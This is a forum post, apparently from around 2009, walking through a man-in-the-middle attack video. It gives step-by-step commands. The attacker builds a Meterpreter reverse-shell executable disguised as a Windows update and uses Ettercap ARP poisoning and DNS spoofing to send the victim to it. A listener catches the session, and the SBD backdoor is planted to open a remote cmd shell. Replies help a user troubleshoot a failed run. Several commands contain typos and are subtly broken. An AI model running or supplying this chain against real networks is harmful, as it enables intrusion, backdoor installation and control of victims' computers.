[Video] Attack: Man In The Middle {MITM} (ettercap, metasploit, SBD)
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2319124
Download video: http://www.mediafire.com/?338fbcekne9pd0b
What is this?
By setting up a fake web site, we social engineer our target to run our exploit. The end result gives us command line access to our target's PC.How does this work?
> Ettercap to do the MITM Attack
> Metasploit for the exploit
> Secure BackDoor (SBD) for the backdoor
> Apache for the web server
What do I need?
> Ettercap
> Metasploit
> A web server
> SBD (optional)
*all of this is on backtrack 4*
Network Setup:
Attackers IP: 192.168.1.104
Targets IP: 192.168.1.101
Gateway IP: 192.168.1.1
Software
Name: Ettercap
Version: 0.7.3
Home Page: http://ettercap.sourceforge.net/
Download Link: http://prdownloads.sourceforge.net/ettercap/ettercap-NG-0.7.3.tar.gz?download
Name: Metasploit
Version: 3.3
Home Page: http://www.metasploit.com/
Download Link: http://spool.metasploit.com/releases/framework-3.2.tar.gz
Name: SBD
Version: 1.36
Home Page: http://tigerteam.se/
Download Link: http://packetstormsecurity.org/UNIX/netcat/sbd-1.36.tar.gz
Source: http://www2.packetstormsecurity.org/...earchvalue=sbd
Commands:
Code:
/pentest/exploits/framework3/msfpayload/meterpreter/reverse_tcp LHOST=192.168.1.104 X > /var/www/Windows-KB183905-x86-ENU.exe
kate /var/www/index.html
>*Relace filename with new one, Windows-KB183905-x86-ENU.exe*
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcper
SET LHOAT 192.168.1.104
exploit
cd /usr/share/ettercap/mv -f etter.dns etter.dns.old
kate etter.dns
> * A 192.168.1.104
ettercap -i wlan0 -T -q -P dns_spoof -M ARP /http://192.168.1.1/ /http://192.168.1.101/
upload /root/tools/backdoors/sbd-1.36/sbd.exe C:/
execute -H -f "C:/sbd.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 192.168.1.104"
wine /root/tools/backdoors/sbd-1.36/sbd.exe -l -k g0tmi1k -p 7332
Notes:
Sorry for the poor video editing on this one - it is cut from a final video called "g0tmi1k's home network" which is still incomplete.
Song: Mr. Scruff - Is He Ready & Mr. Scruff - Get a Move On
Video length: 06:57
Capture length: 7:40
Blog Post:http://g0tmi1k.blogspot.com/2009/07/videotutorial-man-in-middle-mitm-attack.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1658-[video]-attack-man-middle-{mitm}-ettercap-metasploit-sbd.html
Re: [Video] Attack: Man In The Middle {MITM} (ettercap, metasploit, SBD)
dear g0tmi1k,
the execution was finished from the first until the spoofing with ettercap.
but, when i was opening my browser, n run the Windows-KB873549-x86-ENU.exe to sv to the computer, it seems, the downloading nothing's happend. n the attacker's metasploit also not appeared the sessions.
can you tell me what should i do?
Re: [Video] Attack: Man In The Middle {MITM} (ettercap, metasploit, SBD)
Quote:
Originally Posted by
kataibrengsek
dear g0tmi1k,
the execution was finished from the first until the spoofing with ettercap.
but, when i was opening my browser, n run the Windows-KB873549-x86-ENU.exe to sv to the computer, it seems, the downloading nothing's happend. n the attacker's metasploit also not appeared the sessions.
can you tell me what should i do?
Can each computer ping each other?
Are you using the correct IP addresses?
Does the target have a firewall/anti virus blocking it?
